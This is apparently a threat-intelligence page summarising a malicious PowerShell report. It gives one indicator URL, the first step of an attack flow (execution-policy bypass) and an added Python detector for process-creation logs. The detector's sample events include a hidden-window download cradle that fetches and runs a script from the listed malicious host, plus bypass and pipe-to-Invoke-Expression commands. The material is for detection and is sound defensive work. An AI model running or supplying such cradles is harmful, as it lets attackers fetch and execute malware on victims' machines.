IOC Radar
TLP:WHITE · 1 IOC

Malicious PowerShell Analysis

Author: APOPHIS
Published February 17, 2025 · Original Report

Diamond Model

Adversary: unknown
Infrastructure (1): http://185.215.113.97…
Capability: unknown
Victim: unknown

Attack Flow (9 steps · MITRE ATT&CK mapped; only step 1 of 9 is shown)

Step 1/9: Execution Policy Bypass
Tactic: Defense Evasion (TA0005) · Technique as listed: T1548.001
Action: Bypass execution policy
The script bypasses the local PowerShell execution policy so that it can run. Execution policy is a safety feature, not a security boundary: it is overridden per process with "-ExecutionPolicy Bypass" (or the prefix form "-ep bypass"), with "Set-ExecutionPolicy Bypass -Scope Process", or by piping script text into Invoke-Expression, and none of these requires elevation. One caveat on the mapping: T1548.001 in ATT&CK is "Abuse Elevation Control Mechanism: Setuid and Setgid", a Unix technique; a PowerShell execution-policy bypass is normally mapped to T1059.001 (Command and Scripting Interpreter: PowerShell) or T1562.001 (Impair Defenses: Disable or Modify Tools).
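Because the bypass in step 1 is a command-line artefact, the natural place to catch it is process-creation telemetry. The following Python is an added example written for this page, not code from the report or its author: it runs a small set of rules over constructed Sysmon Event ID 1 / Windows 4688-style command lines and flags the bypass variants, a hidden window, a download cradle, and a hit on the report's IOC URL. Assumptions: the trailing period on the URL in the indicator table is punctuation rather than part of the URL, and the sample events, paths and PIDs are made up.

```python
"""Flag PowerShell execution-policy bypasses and download cradles in
process-creation command lines (Sysmon Event ID 1 or Windows Security
4688 with command-line auditing enabled). Added example; sample events
below are constructed, not real telemetry."""
import re
from typing import Dict, List

# IOC from the report's indicator table. The trailing period shown in the
# table is assumed to be punctuation, not part of the URL.
IOC_URLS = ["http://185.215.113.97/files/anon/GeneratedInstaller.ps1"]

# Behavioural rules. Execution policy is a safety feature, not a security
# boundary, so each of these is trivial for an attacker; the point is that
# they are cheap, high-signal strings in command-line telemetry.
RULES = [
    # -ExecutionPolicy Bypass|Unrestricted, including the parameter prefixes
    # PowerShell accepts (-ep, -ex, -exec, ...) and the -Param:Value form.
    # The lookbehind keeps "Set-ExecutionPolicy" from matching this rule.
    ("execpolicy_bypass_flag",
     re.compile(r"(?<!\S)-(?:ep|ex\w*)[\s:]+(?:bypass|unrestricted)\b", re.I)),
    # Set-ExecutionPolicy Bypass|Unrestricted in any scope.
    ("set_executionpolicy_bypass",
     re.compile(r"set-executionpolicy(?:\s+-executionpolicy)?[\s:]+(?:bypass|unrestricted)\b", re.I)),
    # Script text read from a file and piped to Invoke-Expression never
    # goes through the policy check at all.
    ("content_piped_to_iex",
     re.compile(r"\b(?:get-content|gc|cat|type)\b.*\|\s*(?:iex|invoke-expression)\b", re.I)),
    # Hidden window, a common companion flag in malicious launches.
    ("hidden_window",
     re.compile(r"(?<!\S)-w(?:indowstyle)?[\s:]+hidden\b", re.I)),
]

# Download cradle = a fetch primitive and Invoke-Expression in the same
# command line, in either order, so this is checked as two regexes.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|invoke-restmethod"
    r"|\biwr\b|\birm\b|\bcurl\b|\bwget\b", re.I)
IEX_RE = re.compile(r"\biex\b|invoke-expression", re.I)


def scan_command_line(cmd: str) -> List[str]:
    """Return the names of all rules the command line triggers."""
    findings = [name for name, rx in RULES if rx.search(cmd)]
    if DOWNLOAD_RE.search(cmd) and IEX_RE.search(cmd):
        findings.append("download_cradle")
    lowered = cmd.lower()
    if any(url.lower() in lowered for url in IOC_URLS):
        findings.append("ioc_url_match")
    return findings


def scan_events(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Scan process-creation events; return only those with findings."""
    hits = []
    for ev in events:
        findings = scan_command_line(str(ev["cmd"]))
        if findings:
            hits.append({"pid": ev["pid"], "findings": findings})
    return hits


# Constructed sample events (not real telemetry); only the URL in the
# first one comes from the report. Two are benign administrative launches.
SAMPLE_EVENTS = [
    {"pid": 4120, "cmd": r'''powershell.exe -NoP -W Hidden -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('http://185.215.113.97/files/anon/GeneratedInstaller.ps1')"'''},
    {"pid": 4188, "cmd": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\nightly-backup.ps1"},
    {"pid": 4301, "cmd": r"powershell.exe -ExecutionPolicy:Bypass -File C:\Users\Public\stage.ps1"},
    {"pid": 4350, "cmd": r'''powershell.exe -c "Set-ExecutionPolicy Bypass -Scope Process -Force; & 'C:\Users\Public\stage.ps1'"'''},
    {"pid": 4402, "cmd": r'''powershell.exe -nop -c "gc C:\Users\Public\stage.txt | iex"'''},
    {"pid": 4477, "cmd": r'''powershell.exe -c "Set-ExecutionPolicy RemoteSigned -Scope LocalMachine"'''},
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit["pid"], ", ".join(hit["findings"]))
```

Windows 4688 events carry the command line only when "Include command line in process creation events" is enabled; Sysmon Event ID 1 logs it by default. The short forms "-ep" and "-ex" are matched because PowerShell accepts any unambiguous prefix of a parameter name, and the lookbehind on the flag rule stops "Set-ExecutionPolicy Bypass" from firing both rules at once. RemoteSigned is deliberately not flagged, since it is the default on servers and a normal administrative choice.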

5W+H Threat Analysis

Analysis unavailable

Indicators of Compromise (1)

Type: URL
Indicator: http://185.215.113.97/files/anon/GeneratedInstaller.ps1.
Tags: intel-blog, network, url
Confidence: High
Score: 58
First Seen: Jun 2, 26

IOC Relationship Graph (1 IOC in total)

URL (1) → REPORT: Malicious PowerShell Analysis